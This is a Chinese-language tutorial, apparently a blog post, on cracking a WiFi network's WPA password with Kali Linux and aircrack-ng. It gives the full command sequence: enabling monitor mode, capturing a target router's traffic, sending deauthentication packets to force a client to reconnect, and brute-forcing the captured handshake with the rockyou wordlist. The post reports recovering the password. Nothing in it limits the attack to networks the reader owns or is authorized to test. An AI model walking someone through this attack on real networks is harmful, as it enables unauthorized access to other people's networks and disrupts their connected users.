首先,如果kali是装在虚拟机里面的话,是不能用物理机的无线网卡的。所以,如果我们要想进行无线破解,需要外接一个无线网卡设备,并且该设备要支持 monitor 监听模式
iwconfig :系统配置无线网络设备或显示无线网络设备信息的命令。iwconfig命令类似于ifconfig命令,但是他配置对象是无线网卡,它对网络设备进行无线操作,如设置无线通信频段
auto: 自动模式essid:设置ESSIDnwid:设置网络IDfreq: 设置无线网络通信频段chanel: 设置无线网络通信频段sens: 设置无线网络设备的感知阀值mode: 设置无线网络设备的通信设备ap: 强迫无线网卡向给定地址的接入点注册nick<名字>: 为网卡设定别名rate<速率>: 设定无线网卡的速率rts<阀值>: 在传输数据包之前增加一次握手,确信信道在正常的power: 无线网卡的功率设置
破解无线wifi可以分为以下几步:
- 查看网卡名字:iwconfig
- 设置网卡为监听模式:airmon-ng start wlan0
- 扫描附近的WIFI:airodump-ng wlan0mon
- 选定一个路由器,并监听其流量:airodump-ng -w tplink -c 11 --bssid BC:46:99:3D:66:D6 wlan0mon
- 选定连接的一个客户端,进行攻击:aireplay-ng -0 50 -a BC:46:99:3D:66:D6 -c A0:AF:BD:D8:E6:31 wlan0mon
- 对抓取到的cap包进行暴力破解:aircrack-ng -w password.txt -b BC:46:99:3D:66:D6 tplink-01.cap
查看无线网卡名字:iwconfig 或者 ifconfig -a 都可以
开启网卡监听模式:airmon-ng start wlan0 。网卡开启了监听模式之后网卡的名字就变为 wlan0mon 了,以后的所有命令中的网卡名都是叫 wlan0mon
扫描附近的WIFI:airodump-ng wlan0mon ,会显示附近所有的WIFI信号。
- BSSID代表路由器的 MAC 地址
- PWR 代表信号的强度,数值越大代表信息越强
- CH 代表信道
- ENC代表用的加密的方式
- AUTH 代表认证的方式
- ESSID是WIFI的名字
我们需要选定一个准备破解的WIFI,我们选 tplink-5
监听该路由器的流量:
airodump-ng -w tplink -c 11 --bssid BC:46:99:3D:66:D6 wlan0mon # -w 参数指定生成的文件名 -c 指定信道 --bssid指定路由器的MAC地址 下面的 STATION 是连接该WIFI的客户端,下面这里只有一个客户端连接了该WIFI。如果有多个客户端连接的话,我们最好选择活跃点的客户端。
重新打开一个命令行窗口,开始攻击!之前的窗口继续保留,用于观察是否抓包成功
aireplay-ng -0 50 -a BC:46:99:3D:66:D6 -c A0:AF:BD:D8:E6:31 wlan0mon # 50是发包的数量 -a指定路由器的MAC地址 -c指定连接的客户端的MAC地址 该命令会打断连接客户端和WIFI之间的连接,等到客户端重新连接WIFI的时候,就会抓取他们之间的握手认证包!
如果看到下面红色圈住的这些,就说明握手包抓取成功了
我们可以看到会生成四个文件,其中我们有用的文件是以 cap 后缀结尾的文件
对抓取到的cap包进行破解,这需要我们准备好破解的密码字典。所以,无论是任何破解,都需要一个强大的密码字典!
kali下自带有一份无线密码字典——> /usr/share/wordlists/rockyou.txt.gz ,我们将其解压
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b BC:46:99:3D:66:D6 tplink-01.cap #-w指定 密码字典 -b指定路由器的MAC地址可以看到,破解成功!该WIFI的密码为 www.123.com
从最后可以看出,要想破解出WIFI的密码,还是得需要一个很强大的字典!